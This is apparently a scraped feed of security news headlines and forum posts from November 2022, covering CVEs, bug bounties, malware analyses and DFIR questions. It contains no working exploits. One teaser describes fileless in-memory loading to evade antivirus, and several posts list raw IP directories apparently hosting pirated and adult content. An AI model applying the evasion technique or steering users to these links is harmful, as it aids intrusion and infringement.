    How old hacking techniques like DLL Hijacking still work in the present day and how you can find them yourself. Continue reading on InfoSec Write-ups »
  • Open

    Replacement for Helix Retriever
    I don't do forensic work often, just frequently enough to maintain my GCFA certification and keep my skills kinda in the right decade. That said, I'm looking for the equivalent of a tool I often used in the late '00s. Drew Fahey's "Retriever" was on the Helix forensics distribution. I found it to be very helpful in some of my corporate internet misuse investigations. Simply put, you point it at a mounted image, and it would retrieve all images and videos from any path you point to on that image, displaying them as thumbnails. Drew described it as a utility for "knock and talks" or "quick peeks", but I found it useful in the thankfully rare situation where we are investigating a user's PC that may or may not have downloaded NSFW material. Although I still have my old 2007 Helix CDs sitting around, and they'd likely still work if I can find a PC with a CD drive (and maneuver my way around UEFI restrictions), I'm guessing there's a newer, better alternative out there. What do you use? submitted by /u/RulesLawyer42 [link] [comments]
  • Open

    CVE-2022-32932: ZinComputeProgramUpdateMutables() OOB write due to double fetch
    Article URL: https://0x36.github.io/CVE-2022-32932/ Comments URL: https://news.ycombinator.com/item?id=33627702 Points: 1 # Comments: 0
  • Open

    Exiftool — tool to get meta information from image, audio and video files.
    Exiftool is a tool used in forensic analysis and penetration testing to gather information over file metadata data. Continue reading on System Weakness »
    Exiftool — tool to get meta information from image, audio and video files.
    Exiftool is a tool used in forensic analysis and penetration testing to gather information over file metadata data. Continue reading on Medium »
    OSINT AND THE METAVERSE.
    WHAT IS METAVERSE? Continue reading on Medium »
  • Open

    High res scans of old movie posters and some other miscellaneous scans.
    submitted by /u/lefunnyusernamexd [link] [comments]
    how do i scan all links on windows?
    chrome fire fox extensions welcomed or free downloable applications any help is appreciated thanks submitted by /u/Shad27753 [link] [comments]
    How to make sure I'm not downloading any viruses from opendirectories?
    I recently found this method to download stuff just by typing "index of...", can someone tell me whether there is any malware risk when downloading movies/tv series? I want to download Arrow Season 01 (This link: http://167.114.174.132:9092/series/arrow/1/1/ ) How do I find out whether the files in it are safe? Usually when I download videos they are always .mp4 format. But these files are .mkv format, google says .mkv can sometimes potentially be viruses. How to know whether the files in the link are safe? I always scan the files with and AV after downloading them and make sure that there aren't any executables. Can .mkv files be harmful? Is it possible for a virus to be disguised as a .mkv? submitted by /u/COGex123 [link] [comments]
  • Open

    SecWiki News 2022-11-16 Review
    如何成为优秀工程师之软技能篇 by ourren 网络空间测绘理论体系概述 by ourren 域渗透思维导图 by 君行路 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-16 Review
    如何成为优秀工程师之软技能篇 by ourren 网络空间测绘理论体系概述 by ourren 域渗透思维导图 by 君行路 更多最新文章,请访问SecWiki
  • Open

    Network Security Trends: May-July 2022
    Unit 42 provides summaries and analysis of the vulnerabilities published between May-July 2022, including the severity and attack origin distribution. The post Network Security Trends: May-July 2022 appeared first on Unit 42.
  • Open

    autoSSRF:一款基于上下文的智能SSRF漏洞扫描工具
    autoSSRF基于上下文识别漏洞,并且适用于大规模扫描任务。
    如何使用UnBlob从任意格式容器中提取文件
    UnBlob能够解析已知的超过30种不同格式的文档、压缩文件和文件系统,并能够从中递归提取文件内容。
    FreeBuf早报 | 欧盟加强网络防御应对俄乌网络战;NSA敦促使用内存安全的编程语言
    加强欧洲安全网络能力,促进军民合作,填补潜在安全漏洞,减少战略依赖,并发展网络技能。
    云安全系列1:深度解析云安全责任共担模型
    云作为一股改变世界的技术趋势,正被各种类型的组织所采用,基于云的数字化转型在加速进行。伴随着云计算一同快速发展的一个重要问题就是安全性。在云安全中一个首先需要使用者清晰的概念就是责任共担模型,今天我们
    马斯克执掌推特三周后,双因素身份认证出现漏洞
    该漏洞出现之际正值埃隆•马斯克执掌推特第三周,公司的主要安全合规人员离职,大量员工和承包商被解雇。
  • Open

    Hidden parameters discovery suite
    Hidden parameters discovery suite written in Rust. Continue reading on Medium »
    Cracking Passwords using John The Ripper
    John the Ripper is a password-cracking tool that can crack hundreds of hashes, ciphers, and even password-protected files. Continue reading on Stealth Security »
    Cracking Passwords using John The Ripper
    John the Ripper is a password-cracking tool that can crack hundreds of hashes, ciphers, and even password-protected files. Continue reading on Stealth Security »
    Cracking Passwords using John The Ripper
    John the Ripper is a password-cracking tool that can crack hundreds of hashes, ciphers, and even password-protected files. Continue reading on Stealth Security »
    “The Social Network” teaching you Cyber Offence
    First thing: Watch this a few times, or one if you’re attentive Continue reading on Medium »
  • Open

    DLL Hijacking Persistence Using Discord
    No content preview
    Fine-Tune Security Alerts & Optimisation
    Blue Team SOC Activity Continue reading on InfoSec Write-ups »
  • Open

    DLL Hijacking Persistence Using Discord
    No content preview
    Fine-Tune Security Alerts & Optimisation
    Blue Team SOC Activity Continue reading on InfoSec Write-ups »
  • Open

    DLL Hijacking Persistence Using Discord
    No content preview
    Fine-Tune Security Alerts & Optimisation
    Blue Team SOC Activity Continue reading on InfoSec Write-ups »
  • Open

    Let's talk about Nuclei YAML syntax templates and Pocsuite3 compatibility ideas
    Author: fenix@Knownsec 404 Team Chinese version: https://paper.seebug.org/2015/ Introduction Pocsuite3 is an open source remote vulnerability testing framework built by Knownsec 404 Team based on t...
    在 Android 中开发 eBPF 程序学习总结(二)
    作者:Hcamael@知道创宇404实验室 日期:2022年11月16日 相关阅读: 在 Android 中开发 eBPF 程序学习总结(一) 在上一章的基础上深入研究 在上一篇文章中,我自己改了一版BPF程序的代码bpftest.c,代码也在上一篇文章中放出来了,但是一个完整的BPF程序,还需要一个用户态的loader,也就是需要有一个读取BPF程序给我们数据的程序。 之前也说了,可以使用...
  • Open

    Let's talk about Nuclei YAML syntax templates and Pocsuite3 compatibility ideas
    Author: fenix@Knownsec 404 Team Chinese version: https://paper.seebug.org/2015/ Introduction Pocsuite3 is an open source remote vulnerability testing framework built by Knownsec 404 Team based on t...
    在 Android 中开发 eBPF 程序学习总结(二)
    作者:Hcamael@知道创宇404实验室 日期:2022年11月16日 相关阅读: 在 Android 中开发 eBPF 程序学习总结(一) 在上一章的基础上深入研究 在上一篇文章中,我自己改了一版BPF程序的代码bpftest.c,代码也在上一篇文章中放出来了,但是一个完整的BPF程序,还需要一个用户态的loader,也就是需要有一个读取BPF程序给我们数据的程序。 之前也说了,可以使用...

  • Open

    Getting Binaries into Memory (Going Fileless)
    In this video, I show how to convert C# executables into PowerShell scripts and then use download cradles to put them directly into memory. This leaves no trace of the executable on disk and can slip by AV/EDR in many cases. Getting Binaries into Memory (Going Fileless) submitted by /u/Infosecsamurai [link] [comments]
  • Open

    Any explanation for why I would be seeing remote PS commands "$global:?" & "prompt" repeatedly in Windows logs? Seems benign, but odd.
    For a DFIR / threat hunting exercise, I looked up remote PS logs (windows event ID 4104) and it's always hard with these labs to know whether I'm looking at cyber range-isms or malicious activity. But ignoring the domain admin being added in this screenshot (although that seems like something to look into, lol), in-between commands I'm seeing this odd $global:? command, which when tested on my local PC just returns True. (logs ordered latest -> earliest in these screenshots) https://i.gyazo.com/4e550867aad3311ddd83f700a4fd40fb.png Any explanation on that? Even if not malicious, I'd just like to understand what I'm looking at and don't have access to a SME on this exercise to ask about it. Then earlier in the logs, I start seeing a different odd command in the same sort of "every-other-command" pattern (but sometimes multiple times in a row): https://i.gyazo.com/a57c8d6db531ec18d89beef40a29248b.png And prompt is not a very complicated command; I looked it up. The default PowerShell prompt displays the current working directory. To display the prompt definition: (Get-Command prompt).definition This seems odd too, but perhaps it's the consequence of something normal / uninteresting. submitted by /u/Jonathan-Todd [link] [comments]
    Any antivirus reccomendations for android?
    I recently ran a malwarebytes scan with no detections but I'm still paranoid. Any reccomendations for antivirus with options to scan? submitted by /u/Foreign-Magician-767 [link] [comments]
    laptop for sans/linux
    Quick question, I had mentioned earlier that I was venturing into cyber security and had a pretty good response. One other item I was curious about is that I was going to purchase a new laptop but want to do so on a budget, around 500$. I had looked at https://www.newegg.com/hp-elitebook-840-g3/p/N82E16834271969 for use with SANS as well as dabbling in Linux, any recommendations for a budget friendly laptop would be greatly appreciated. submitted by /u/nofancyname12 [link] [comments]
    do ssh keys expire?
    Say I create a private/public key pair with putty. Do these keys ever expire? submitted by /u/87390989 [link] [comments]
  • Open

    Domain Escalation with Token Impersonation
    Token Impersonation with Delegation Tokens  — MITRE ATT&ACK — Access Token Manipulation T1134 Continue reading on R3d Buck3T »
    Simple Bloodhound Tutorial
    What is BloodHound Continue reading on System Weakness »
  • Open

    AUC- Hotaru Games Writeups
    Hello, It’s Ahmed Mahmoud(xElessaway), first it was my pleasure to create the steganography challenges in this ctf. Second Challenges was… Continue reading on Medium »
    Road to Nowhere — Hacktoria Contract Walkthrough (Understanding OSINT)
    Today we are solving, an amazing contract called, ‘Road to Nowhere’ which is available on Hacktoria. Continue reading on Medium »
    A Strange File Writeup
    It takes an insane level of effort for an insane challenge — VEEXH Continue reading on The Sleuth Sheet »
  • Open

    Where is Brian ?
    http://103.74.121.78/ submitted by /u/SubliminalPoet [link] [comments]
    Just this...
    Shows,but is it an O/D... http://78.203.154.250 my clean skin is in the post yay... submitted by /u/xanderTgreat [link] [comments]
    Movies/Series in English (ENG)
    https://74.115.139.239:9090/ http://130.204.8.243:8000/ https://198.211.10.158/ http://62.210.122.240:8090/ http://51.81.217.201:8081/ http://54.37.91.120:49156/ https://45.148.120.91/ http://73.66.228.201:9800/ http://196.216.49.238/ submitted by /u/SubliminalPoet [link] [comments]
    Movies, series, anime, books, software, ROMS, music, games
    See the comments for probably shadowbanned URLs. This is a repost because the first one got shadowbanned. http://5.135.178.104:10987/ => Movies, series, audiobooks, software http://5.135.165.24/files/ => Some movies, but mostly french-translated mangas http://37.187.0.8/ => Sound banks, audio software, movies/series (french and multi) http://5.135.162.62/ => Russian dubbed animes http://51.75.134.149/ => Spanish radio rips / podcasts http://37.187.112.153/ => Anime (German subs) http://37.187.114.44/download/ => Mostly series, movies (french) http://37.187.121.54:38946/ => Games, movies http://37.187.124.143:9000/ => Movies, series, (mostly multi and french subs), HQ http://81.250.154.102/ => Indie music? https://81.51.239.219/ => ROMS, French books https://163.172.40.198/ => French radio rips https://podcast.ouest-track.com/ => All podcasts of "ouest-track" radio (french) https://ffgl.eu/images/ => Router firmwares ​ There doesn't seem to be NSFW content on those ODs, I didn't go through everything though. submitted by /u/MasterIO02 [link] [comments]
  • Open

    Distributed Identity aka Identity on the Blockchain - What it is and its vulnerable attack surfaces. (Part 1)
    submitted by /u/CyberArkLabs [link] [comments]
    Pixel 6 Bootloader: Exploitation (part 3)
    submitted by /u/jeandrew [link] [comments]
    Overview of SQLi and Access Flaws in Zendesk
    submitted by /u/TotallyNotTeaPot [link] [comments]
    Hyperpom: An Apple Silicon Fuzzer for 64-bit ARM Binaries
    submitted by /u/jeandrew [link] [comments]
    Checkmk: Remote Code Execution by Chaining Multiple Bugs (3/3)
    submitted by /u/monoimpact [link] [comments]
    GuardDog: Identifying malicious PyPI packages using static code analysis and package metadata analysis
    submitted by /u/thorn42 [link] [comments]
    Stealing passwords from infosec Mastodon - without bypassing CSP
    submitted by /u/albinowax [link] [comments]
    ABI compatibility in Python: how hard could it be?
    submitted by /u/yossarian_flew_away [link] [comments]
    Hacking Salesforce-backed WebApps
    submitted by /u/albinowax [link] [comments]
    Intro to AJP, AJPFuzzer and re-discovering Ghostcat
    submitted by /u/nibblesec [link] [comments]
    DivestOS CVE Patcher - A tool for downloading, checking, and applying (CVE) patches to a (kernel) repository
    submitted by /u/Gallus [link] [comments]
    WonderCMS 3.1.3 Vulnerable to Authenticated Server-Side Request Forgery – CVE-2020-35313
    submitted by /u/SL7reach [link] [comments]
  • Open

    Windows 10 File Activity Logs
    I need to get log files of data being transferred from the hard drive of a computer to an external usb attached to the device. I know when it happened roughly so combing through log files wont be too tedious I hope. Are there any programs that make getting activity like this easy? Recommendations would be helpful. submitted by /u/QualityQontent [link] [comments]
  • Open

    P1 Bug Bounties: What is an IDOR, and how does IDOR == $$$?
    TL;DR- A brief post about what an IDOR is, and what they mean to the bug-hunting world. Continue reading on The Gray Area »
    Web App pentesting/Bug Bounty Bible
    Wassup everyone, I hope you all are doing great at your lives and I know you all might be brutally cussing me right now for not uploading… Continue reading on Medium »
    Winning QR with DOM-Based XSS | Bug Bounty POC
    Background: Continue reading on Medium »
    A Brief Introduction to SAML Security Vector
    SAML started in 2001, and the final SAML 2.0 version was released in 2005. Continue reading on Medium »
    BMW sistemində necə boşluq tapdım?
    Mercedes-Benz sistemində tapdığım “subdomain takeover” boşluğundan sonra dostlardan birinin “İnşallah BMW-də açıq taparsan” cümləsindən… Continue reading on Medium »
    Wanna Bet That CSRF Is Not As Hard as you think?
    An introduction of CSRF attack and with an example on how an hacker can take advantage of sessions to prepare some dangerous attacks. Continue reading on CodeX »
    Wanna Bet That CSRF Is Not As Hard as you think?
    An introduction of CSRF attack and with an example on how an hacker can take advantage of sessions to prepare some dangerous attacks. Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-11-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Sessão Dupla: X e Pearl
    Antes deste ano, eu jamais tinha ouvido falar em Ti West. Tudo mudou com o lançamento de X — A Marca da Morte. O cineasta antes realizou… Continue reading on Medium »
    There is no escape
    At least, not the way you expect. Continue reading on Medium »
  • Open

    Linux History File Timestamps
    While working at TrustedSec, I was issued a new company-furnished laptop to work from. While the Mac OS environment was useful, I found it useful to also setup an Ubuntu virtual machine. One reason is so I can have access to a Linux host that is very similar to the garden variety of Linux systems... The post Linux History File Timestamps appeared first on TrustedSec.
  • Open

    Critical Vulnerability in Spotify's Backstage
    Article URL: https://www.securityweek.com/organizations-warned-critical-vulnerability-backstage-developer-portal-platform Comments URL: https://news.ycombinator.com/item?id=33608747 Points: 1 # Comments: 1
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    No content preview
    Gauing+Nuclei for Instant Bounties
    No content preview
    Stealthy Persistence While Using Windows Terminal.
    No content preview
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    No content preview
    Gauing+Nuclei for Instant Bounties
    No content preview
    Stealthy Persistence While Using Windows Terminal.
    No content preview
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    No content preview
    Gauing+Nuclei for Instant Bounties
    No content preview
    Stealthy Persistence While Using Windows Terminal.
    No content preview
  • Open

    FreeBuf早报 | CISA称选举中期投票不受网络攻击影响;意大利禁止使用面部识别技术
    网络安全和基础设施安全局 ( CISA ) 主任 Jen Easterly 周三发表声明称,中期投票程序没有受到网络攻击的干扰或破坏。
    速查!安卓系统可能遭遇重大风险,两分钟可轻松破解锁屏
    安卓系统可能遭遇了重大安全风险,只要能拿到对方的手机,就有可能轻松破解手机的锁屏密码。
    VuCSA:一款包含大量漏洞的客户端-服务器安全练习平台
    广大研究人员可以利用VuCSA来学习、研究和演示如何对非HTTP厚客户端执行安全渗透测试。
    谷歌服软!3.915 亿美金求和解
    谷歌将支付 3.915 亿美元,就40个州指控谷歌非法追踪用户位置达成和解。
    如何使用jscythe并通过Node.js的Inspector机制执行任意JS代码
    在jscythe帮助下,研究人员可以利用Node.js所提供的Inspector机制来强制性让基于Node.js/Electron/v8实现的进程去执行任意JavaScript代码。
  • Open

    Open redirect at mc-beta-cloud-acronis.com
    Acronis disclosed a bug submitted by angeltsvetkov: https://hackerone.com/reports/846389
  • Open

    聊聊 Nuclei YAML 语法模版及 Pocsuite3 的兼容思路
    作者:fenix@知道创宇404实验室 日期:2022年11月15日 前言 Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架【1】。框架本身使用 Python3 开发,集成了 ZoomEye、Shodan、CEye、Interactsh 等众多安全服务的 API,用户可以基于 Pocsuite3 快速编写 PoC/Exp,对批量目标进...
  • Open

    聊聊 Nuclei YAML 语法模版及 Pocsuite3 的兼容思路
    作者:fenix@知道创宇404实验室 日期:2022年11月15日 前言 Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架【1】。框架本身使用 Python3 开发,集成了 ZoomEye、Shodan、CEye、Interactsh 等众多安全服务的 API,用户可以基于 Pocsuite3 快速编写 PoC/Exp,对批量目标进...
  • Open

    RegRipper Value Proposition
    I recently posted to LinkedIn, asking my network for their input regarding the value proposition of RegRipper; specifically, how is RegRipper v3.0 of "value" to them, how does it enhance their work? I did this because I really wanted to get the perspective of folks who use RegRipper; what I do with RegRipper could be referred to as both "maintain" and "abuse". Just kidding, but the point is that I know, beyond the shadow of a doubt, that I'm not a "typical user" of RegRipper...and that's the perspective I was looking for. Unfortunately, things didn't go the way I'd hoped. The direct question of "what is the value proposition of RegRipper v3.0" was not directly answered. Other ideas came in, but what I wasn't getting was the perspective of folks who use the tool. As such, I thought I'd tr…

  • Open

    USEFUL WEBSITES FOR PEN-TESTERS, HACKERS & BUG HUNTERS✳hackers wont believe they exist
    Exploits Database 💥 Continue reading on Medium »
    VALID E-mail address payload lists of different bug classes
    cross-site scripting: Continue reading on Medium »
    The Complete Guide To Cyber Security Youtubers
    It can be difficult to find good quality Cyber Security YouTubers, therefore I have created a definitive list of all the best Cyber… Continue reading on Medium »
    Malware Techniques
    This is a repository of resource about Malware techniques. A curated list of resources to analyse and study malware techniques. Continue reading on Medium »
    Bug Bounty Tips — Part 1
    Here are some tips and annotations that i’ve made based on articles and writeups that i’ve read Continue reading on Medium »
    Dicas de Bug Bounty — Parte 1
    Aqui estão dicas e anotações que fiz baseadas em artigos e writeups que li Continue reading on Medium »
    P1 Bounties: Cross-Site Scripting (XSS) Tips And Tricks
    TL;DR- A guide on what XSS is, how to find it, how to exploit it, and then how to make the most money off of it. Continue reading on The Gray Area »
    XSS using a username
    XSS triggered by exploiting a vulnerable input field of a signup page. Continue reading on Medium »
    Some “tips” on bug hunting
    Hey guys it’s me Uday and today in this story [This is a dynamic story of bug hunting and you’ll see updates on future, Comments… Continue reading on Medium »
  • Open

    Java Fuzzing with Jazzer compared to Symflower
    Fuzzing is a testing technique where random values are generated as inputs to find unexpected behavior such as crashes and security issues… Continue reading on Medium »
  • Open

    Java Fuzzing with Jazzer compared to Symflower
    Fuzzing is a testing technique where random values are generated as inputs to find unexpected behavior such as crashes and security issues… Continue reading on Medium »
  • Open

    A Technical Analysis of Royal Ransomware [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    Forensic Analysis/e-Discovery Company?
    Hi all, I was wondering if anyone has experience with Archer Hall or TransPerfect Legal Solutions in terms of working with them on forensic analysis and/or e-Discovery cases? I’d like some opinions on each company if possible. submitted by /u/EvidenceNo2488 [link] [comments]
    Encrypted HTML Code
    I have been getting a few HTML files thru our email system. In the past these used to be Base64 Encoded html files that I could easily pipe thru cyberchef and get the actual code to find the URLs or IPs that I would like to block. Recently though I've been getting a string of emails with HTMLs that are using AES encryption to obfuscate the code. I am curious if there is a quick and easy way of decoding the code in the file? I would assume there would need to be as they are ran locally, so the computer would need to decrypt them by itself or with public accessible data to allow the HTML to run. Is there anyone that is able to provide any guidance on how this could be done? Example? The code itself is in two sections the first section is I the code itself, the second section, I assume, is part of the encryption key. File var decrypted = CryptoJS.AES.decrypt("EncryptedCode", "encryptedkey????");document.write(decrypted.toString(CryptoJS.enc.Utf8)); I changed some of the source paths, if you need the back please me know. submitted by /u/Sparks_IT [link] [comments]
    Spyguard
    Anyone having any luck using spyguard (SpyGuard · GitHub) ? We went as far as getting the WIFI AP up but we can't connect to it (tried several different devices). submitted by /u/KLDSpeedyfly [link] [comments]
    What sort of expert do I need?
    I'm a lawyer and I have a digital document that is a suspected forgery in a civil case I'm involved in. I am aware that there are Questioned/Forensic Document Examiners, but my understanding is that they are primarily concerned with physical documents, including forged signatures and handwriting. In my case, the suspected forgery is currently a digital document in PDF format. What kind of forensics expert do I need to provide expert testimony concerning a suspected forged PDF document? submitted by /u/FabsudNalteb [link] [comments]
    Is using an Android emulator like BlueStacks a forensically viable method of testing app behavior?
    For example, if I wanted to confirm where, how, and when an application creates folders in the file system when I send an attachment. And I do my due diligence to match the operating system and version numbers. Could this be used as an explanation in court, or is this a dangerous oversimplification or misunderstanding of BlueStacks capability? submitted by /u/Expensive_Ad6442 [link] [comments]
  • Open

    Posting on behalf of a friend who believes she's been hacked for the past two years. Looking for any advice.
    So, I've been maliciously targeted by some a group of ex-coworkers and was hacked completely on my android phone because I left it unattended. I leave that job, switch cell providers and switch to iPhone. I'm still noticing some weird activity on my iPhone and am worried these women are still targeting me. I know there is nothing physically (like a virus) on the phone and it has been updated to iOS ver 16. This phone has never been left alone. I just want to know if there's anyway my phone can still be targeted remotely or as long as the "hacker" is in close proximity. Or there any network based methods that would allow you to monitor or control an iPhone? Phone make: iPhone 13 Pro Provider: AT&T Issues/concerns: -Every time Safari is opened, it wants me to verify that I'm not a robot because of unusual traffic detected from my phone -I have not been receiving texts, but I can send them. I usually have to call AT&T support to fix it - when I attempt to call certain contacts, it doesn't ring through and goes straight to voice-mail, it does go through if I use Whatsapp. Those contacts are also unable to call me unless using Whatsapp -my social media feeds are not reflecting what I normally see. It's like there is another person using my profile and interacting with content that I normally never would interact with - the 2FA on my social media/banking apps were turned off and there were no other logins than myself -Tiktok was denied network access, while all other apps like YouTube worked fine, even when on Wi-fi. (I have no VPNs installed on this phone). When it's working normally, I frequently get a message from the app saying that my network is unstable -my iPhone is constantly overheating -my phone is not receiving service despite having full bars -received suspicious texts with links in them (I always delete these and block the number) submitted by /u/kay-pii [link] [comments]
    SOC with machine learning
    Hello guys, I'm trying to do a SOC implementation with ML and the main poblem i have is getting a great dataset with normal and malicious logs to train it. Should i implement a honeypot to create the dataset or what do you recommend me? Thx submitted by /u/Secret_Director_5984 [link] [comments]
    Sans SEC 504
    Greetings, So I am new(ish) to cyber security and its related components but did have a question I wanted to run by you guys and gals. For a brief background I spent about 9 1/2 years in the Army in the Signal Corp where I had nominal exposure to security though more from the physical perspective. I did not want to keep doing that once I left the Army and so after working some hodge podge jobs, I am going full bore back into school. I have a friend who is heavily involved in cybersecurity having worked for NCC group and AT&T, primarily as a Pen tester, who recommended among other things the SEC 504 course from the SANS institute. To date I have SEC+ and was doing some studying for the A+ and NET+ certifications. Would this be too large of a jump starting out and if so, then where should I start. Thanks in advance for any help. submitted by /u/nofancyname12 [link] [comments]
  • Open

    More of the stuff stuff...
    Columbo, have watched a few of them... https://ia801608.us.archive.org/14/items/columbo/ ​ Muzak... http://dora-robo.com/muzyka/ ​ Music mp4's http://80s.lt/Files/Videos/MusicVideos/With%20Pictures/ ​ Some bootie pics... looks like a vid sale site... https://www.bootysource.com/video/ ​ Now I like these dirs. full of old none woke imagery http://www.portension.com/assets/?C=S;O=D https://karlsbakk.net/fun/ ​ Ass images jpg format http://xapanthe.com/butt/ submitted by /u/xanderTgreat [link] [comments]
  • Open

    BugTrails-23 Writeup
    No content preview
    ‍IW Weekly #33: 15,000 Sites Hacked, $70,000 Bounty, API Injection Vulnerabilities, IDOR…
    No content preview
    Razor Black Active Directory Writeup
    No content preview
    Python APT1 Simulator
    No content preview
  • Open

    BugTrails-23 Writeup
    No content preview
    ‍IW Weekly #33: 15,000 Sites Hacked, $70,000 Bounty, API Injection Vulnerabilities, IDOR…
    No content preview
    Razor Black Active Directory Writeup
    No content preview
    Python APT1 Simulator
    No content preview
  • Open

    BugTrails-23 Writeup
    No content preview
    ‍IW Weekly #33: 15,000 Sites Hacked, $70,000 Bounty, API Injection Vulnerabilities, IDOR…
    No content preview
    Razor Black Active Directory Writeup
    No content preview
    Python APT1 Simulator
    No content preview
  • Open

    SecWiki News 2022-11-14 Review
    中国eBPF大会演讲slide by ourren SecWiki周刊(第454期) by ourren 简单实用远控小工具Todesk by shuteer 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-14 Review
    中国eBPF大会演讲slide by ourren SecWiki周刊(第454期) by ourren 简单实用远控小工具Todesk by shuteer 更多最新文章,请访问SecWiki
  • Open

    A Technical Analysis of Royal Ransomware [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    Threat and Vulnerability Hunting with Application Server Error Logs
    submitted by /u/SnooDucks7926 [link] [comments]
    Starlink User Terminal Modchip
    submitted by /u/Gallus [link] [comments]
  • Open

    Attack Simulator for SolarWinds, Codecov, and ua-parser-js breaches
    The SUNSPOT malware, Codecov breach, and lot of compromised open-source packages (like was the case with ua-parser-js) target the CI/ CD pipeline to modify release build or exfiltrate credentials. As part of writing tests for Harden Runner GitHub Action, which prevents such attacks, there was a need to write attack simulator for these attacks. You can check out the attack simulator here: https://github.com/step-security/attack-simulator It has information and relevant links about these attacks at one place. There are a set of GitHub Actions workflows that simulate the steps from these attacks. There is also a malware simulator npm package which simulates behavior of typical compromised npm packages using preinstall step. Wanted to share in case one is looking for similar attack simulator for attacks on CI/ CD pipelines. submitted by /u/varunsh-coder [link] [comments]
    ASU has a CTF practice site that is open to the public -- pwn.college
    submitted by /u/verfahrensweise [link] [comments]
  • Open

    CVE-2022-32929 – Bypass iOS backup's TCC protection
    Article URL: https://theevilbit.github.io/posts/cve-2022-32929/ Comments URL: https://news.ycombinator.com/item?id=33594357 Points: 3 # Comments: 0
  • Open

    Typhon Reborn With New Capabilities
    Typhon Stealer, a crypto miner/stealer for hire that was discovered in August 2022, now has an updated version called Typhon Reborn. The post Typhon Reborn With New Capabilities appeared first on Unit 42.
  • Open

    极善隐藏的恶意软件,悄悄在亚、非地区泛滥
    一个被称为Worok的网络间谍组织被发现在看似无害的图像文件中隐藏恶意软件,它的存在是攻击者感染链中的一个关键环节。
    Metabase CVE-2021-41277 信息泄露漏洞复现
    漏洞简介Metabase是美国Metabase公司的一个开源数据分析平台。Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。CNNVD编号:CNNVD-202111-1565危害等级:超危CVE编号:CVE-2021-41277FOFA搜索app="M
    FreeBuf早报 | 苹果公司在加州遭集体诉讼;澳大利亚考虑禁止向勒索软件黑客支付赎金
    网友达蒙(化名)在社交平台爆料称,得物 App 疑似私自调用手机权限,删除他上传的维权证据视频。
    得物 APP 被爆删除用户视频,你的相册还安全吗?
    得物 APP 涉嫌通过调用用户手机权限,删除其手机里与问题货物相关的视频。
    逾期不付赎金,高科技公司泰雷兹被Lockbit撕票
    在上月末攻击全球高科技公司泰雷兹后,Lockbit于10日开始泄露被盗数据。
    年涉案金额超2亿,一国际投资欺诈团伙5名成员被捕
    该组织在多个国家设有呼叫中心和办事处,通过虚假网站诱骗投资者投资。
    加密货币交易巨头FTX遭攻击申请破产,6亿美元资产流出
    FTX 此前是世界第二大加密货币交易所,但由于无法应对用户提款需求的增加,现已在美国申请破产保护。
  • Open

    OSINTGRAM. Cos’è e come si installa.
    Continue reading on Medium »
    OSINT and Top 15 Open-Source Intelligence Tools
    This blog sheds some light on the term OSINT, its types, actors interested in OSINT gathering, exploration, and what benefits OSINT… Continue reading on Medium »
  • Open

    IceXLoader 恶意软件破坏了全球数千名受害者的计算机
    作者:Natalie Zargarov 译者:知道创宇404实验室翻译组 原文链接:https://minerva-labs.com/blog/new-updated-icexloader-claims-thousands-of-victims-around-the-world/ IceXLoader于去年六月被FortiGuard实验室发现。它是一种商业恶意软件,用于在受感染的计算机上下载...
    Learn how to attack SAML 2.0 Security
    Author: Longofo@Knownsec 404 Team Chinese version: https://paper.seebug.org/2006/ SAML began in 2001, and the final version of SAML 2.0 was released in 2005. Since then, no major version has been r...
  • Open

    IceXLoader 恶意软件破坏了全球数千名受害者的计算机
    作者:Natalie Zargarov 译者:知道创宇404实验室翻译组 原文链接:https://minerva-labs.com/blog/new-updated-icexloader-claims-thousands-of-victims-around-the-world/ IceXLoader于去年六月被FortiGuard实验室发现。它是一种商业恶意软件,用于在受感染的计算机上下载...
    Learn how to attack SAML 2.0 Security
    Author: Longofo@Knownsec 404 Team Chinese version: https://paper.seebug.org/2006/ SAML began in 2001, and the final version of SAML 2.0 was released in 2005. Since then, no major version has been r...
  • Open

    What do the OXDR and OMDR include?
    Invinsense OXDR and OMDR helps you act like an attacker, know the loopholes in the system, and help your security team fix those loopholes. Continue reading on Medium »
  • Open

    Admin can create a hidden admin account which even the owner can not detect and remove and do administrative actions on the application.
    Reddit disclosed a bug submitted by 41bin: https://hackerone.com/reports/1596663 - Bounty: $5000

  • Open

    Stealing from scammers using SQL Injection | Ethical Hacking Payback — Part 1
    Have you ever heard about these loot box gambling sites where you can bet the items you won playing games (like CS:GO), and get better… Continue reading on Medium »
    How to get in Bug Bounty?
    Hello Everyone, Continue reading on Medium »
    My First Bounty Story
    Hello Everyone, Continue reading on Medium »
    How i get $100 in just 10 minutes !
    Hello everyone ! this is my first medium write up, im very sorry if i have a bad grammar, because english is not my mother tongue. So a… Continue reading on Medium »
    “Neighbour” CTF Walkthrough from TryHackMe
    Hello! Continue reading on Medium »
  • Open

    Inbound Traffic From Chinese IP by Windows System Kernel: ntoskrnl.exe?
    Does anyone know why ntoskrnl.exe "Windows NT Kernel & System" would be receiving data from IP 1.12.11.10 (China) and 1.100.254.169 (Korea)? ​ Screenshot: https://prnt.sc/dXNFTvoxhKpD submitted by /u/Dbolla5 [link] [comments]
    Noob question
    Hi-- I want to use Bitwarden to manage my passwords, but I've never used a password manager before. I understand you install the browser extension to manage your passwords on your desktop/laptop, but what happens when I am traveling away from my computer and I don't want to be reliant on my phone either? Do people write down the passwords of the key sites they will use while traveling without depending on your phone? What's the solution? submitted by /u/pardo2k [link] [comments]
    Are there any good articles/videos on Facebook showing ads based off of conversations and the data that gets sent to them?
    I know we've all experienced it, but curious how it's coded to work and how it seemingly bypasses the green active mic icon on certain android devices. submitted by /u/Austinitered [link] [comments]
    Risk of using someone else's router while only using HTTPS websites?
